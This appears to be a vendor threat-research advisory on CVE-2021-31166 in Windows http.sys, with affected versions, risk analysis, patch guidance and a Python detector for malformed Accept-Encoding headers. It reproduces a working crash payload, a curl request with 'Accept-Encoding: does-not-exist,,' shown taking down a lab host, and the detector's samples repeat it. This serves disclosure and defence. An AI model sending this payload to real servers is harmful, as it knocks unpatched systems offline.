Rapid7
Threat Research

Rapid7 Analysis: CVE-2021-31166

Last updated on Jun 16, 2026

Description

On Tuesday, May 11, 2021, as part of their May Patch Tuesday advisory release, Microsoft published information on CVE-2021-31166, a high-severity remote code execution vulnerability in the Windows HTTP protocol stack. Successful exploitation requires a remote, unauthenticated attacker to send a specially crafted packet to a target server that uses the HTTP Protocol Stack (http.sys) to process packets. Microsoft noted in their advisory that the vulnerability, which carries a CVSSv3 base score of 9.8, has the potential to be wormed (as many protocol vulnerabilities have potential to be).

Public proof-of-concept (PoC) exploit code that crashes a vulnerable target (but does not achieve remote code execution) has been available since May 16, 2021.

Affected products

Early information indicated that only the most recent versions of Windows were vulnerable and that the issue primarily affected web servers built on http.sys. On Friday, May 21, 2021, however, security community members noted that Windows Remote Management (WinRM) is also vulnerable because it, too, is served by the http.sys driver. On Saturday, May 22, 2021, Windows 10 21H1 was also reported as vulnerable. Later that day, it was further noted that any server that responds with the Microsoft-HTTPAPI/2.0 Server header may be vulnerable.

  • Windows 10 Version 21H1
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows 10 Version 20H2 for ARM64-based Systems
  • Windows 10 Version 20H2 for 32-bit Systems
  • Windows 10 Version 20H2 for x64-based Systems
  • Windows Server, version 2004 (Server Core installation)
  • Windows 10 Version 2004 for x64-based Systems
  • Windows 10 Version 2004 for ARM64-based Systems
  • Windows 10 Version 2004 for 32-bit Systems

Rapid7 analysis

CVE-2021-31166 is a use-after-free (memory corruption) vulnerability whose exploitation requires manipulation of kernel memory. The realization that Windows 10 components beyond IIS are vulnerable raises the alarm level slightly given the expanded attack surface; however, reliable weaponization of CVE-2021-31166 for code execution is non-trivial, and exploitation for code execution is unlikely to occur quickly (and even less likely to occur quickly at scale). With that said, the risk is worth taking seriously for those running on more recent Windows update streams: the time between vulnerability disclosure and reliable attacks has decreased significantly over the past year, and defenders are detecting a comparatively high proportion of attacks perpetrated by sophisticated adversaries.

Rapid7 researchers were able to reproduce a crash against a Windows 10 target configured both as a web server and as a WinRM-enabled host (the WinRM session on port 5985 is shown below).

wvu@kharak:~$ curl -v http://192.168.56.4:5985/ -H "Accept-Encoding: does-not-exist,"
*   Trying 192.168.56.4...
* TCP_NODELAY set
* Connected to 192.168.56.4 (192.168.56.4) port 5985 (#0)
> GET / HTTP/1.1
> Host: 192.168.56.4:5985
> User-Agent: curl/7.64.1
> Accept: */*
> Accept-Encoding: does-not-exist,
>
< HTTP/1.1 404 Not Found
< Content-Type: text/html; charset=us-ascii
< Server: Microsoft-HTTPAPI/2.0
< Date: Fri, 21 May 2021 20:48:16 GMT
< Connection: close
< Content-Length: 315
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Not Found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Not Found</h2>
<hr><p>HTTP Error 404. The requested resource is not found.</p>
</BODY></HTML>
* Closing connection 0
wvu@kharak:~$ curl -v http://192.168.56.4:5985/ -H "Accept-Encoding: does-not-exist,,"
*   Trying 192.168.56.4...
* TCP_NODELAY set
* Connected to 192.168.56.4 (192.168.56.4) port 5985 (#0)
> GET / HTTP/1.1
> Host: 192.168.56.4:5985
> User-Agent: curl/7.64.1
> Accept: */*
> Accept-Encoding: does-not-exist,,
>
* Recv failure: Connection reset by peer
* Closing connection 0
curl: (56) Recv failure: Connection reset by peer
wvu@kharak:~$

The first request, with a single trailing comma in Accept-Encoding, is answered normally with a 404. The second request, with two trailing commas, is the malformed form that matters: the target immediately crashes, and the connection is reset.
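As an added example (not Rapid7's code and not part of the original post), the following Python detector classifies the Accept-Encoding header of raw HTTP/1.1 requests the way a reverse proxy or WAF log pipeline in front of an http.sys listener might. It treats any empty list element as a finding and the consecutive-comma form that crashed the target above as high severity, while a single trailing comma (answered with a 404 above) is reported at low severity. The header grammar follows RFC 7231; the request samples are constructed for the example.

```python
"""Flag malformed Accept-Encoding headers of the kind associated with CVE-2021-31166.

Added example, not Rapid7's code. Sample requests below are constructed.
"""
import re
from typing import List, Tuple

# Accept-Encoding per RFC 7231 section 5.3.4: a comma-separated list of
# codings, each optionally weighted with ";q=<qvalue>".
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QVALUE = r"(?:0(?:\.[0-9]{0,3})?|1(?:\.0{0,3})?)"
ELEMENT_RE = re.compile(rf"^(?:{TOKEN}|\*)(?:\s*;\s*[qQ]=\s*{QVALUE})?$")
HEADER_RE = re.compile(rf"^({TOKEN}):[ \t]*(.*?)[ \t]*$")


def accept_encoding_findings(value: str) -> List[str]:
    """Return a description of each problem in an Accept-Encoding value.

    An empty list means the value is well-formed. An entirely empty header is
    legal (it means 'identity only'), so it produces no findings.
    """
    if value.strip() == "":
        return []
    elements = [e.strip() for e in value.split(",")]
    findings = []
    for i, element in enumerate(elements):
        if element == "":
            findings.append(f"empty element at position {i}")
        elif not ELEMENT_RE.match(element):
            findings.append(f"malformed element {element!r} at position {i}")
    return findings


def classify_accept_encoding(value: str) -> Tuple[str, List[str]]:
    """Classify a value as 'high', 'low' or 'none'.

    'high' marks two adjacent empty elements (the ",," form that crashed the
    target in the curl session above); 'low' marks any other finding.
    """
    findings = accept_encoding_findings(value)
    elements = [e.strip() for e in value.split(",")]
    if any(a == "" and b == "" for a, b in zip(elements, elements[1:])):
        return "high", findings
    if findings:
        return "low", findings
    return "none", findings


def scan_raw_request(raw: str) -> Tuple[str, List[str]]:
    """Extract Accept-Encoding from a raw HTTP/1.1 request head and classify it."""
    head = raw.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        m = HEADER_RE.match(line)
        if m and m.group(1).lower() == "accept-encoding":
            values.append(m.group(2))
    if not values:
        return "none", []
    # Repeated header fields combine into one list (RFC 7230 section 3.2.2).
    return classify_accept_encoding(",".join(values))


# Constructed sample requests; the host name and port are placeholders.
SAMPLE_REQUESTS = {
    "normal": "GET / HTTP/1.1\r\nHost: host.example:5985\r\n"
              "Accept-Encoding: gzip, deflate, br\r\n\r\n",
    "weighted": "GET / HTTP/1.1\r\nHost: host.example\r\n"
                "Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0\r\n\r\n",
    "trailing_comma": "GET / HTTP/1.1\r\nHost: host.example:5985\r\n"
                      "Accept-Encoding: does-not-exist,\r\n\r\n",
    "double_comma": "GET / HTTP/1.1\r\nHost: host.example:5985\r\n"
                    "Accept-Encoding: does-not-exist,,\r\n\r\n",
    "no_header": "GET / HTTP/1.1\r\nHost: host.example\r\n\r\n",
}


if __name__ == "__main__":
    for name, raw in SAMPLE_REQUESTS.items():
        sev, findings = scan_raw_request(raw)
        print(f"{name:15s} severity={sev:5s} {findings}")
```

Wiring this into a log pipeline only requires feeding it the request head; the classification deliberately keys on the list structure rather than on any specific coding name, since the crash does not depend on the token `does-not-exist`.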

Guidance

KB5003173 provides guidance on patching CVE-2021-31166. Patches may be downloaded directly from the Microsoft Update Catalog.

References

  • https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166
  • https://twitter.com/0vercl0k/status/1393970836302811138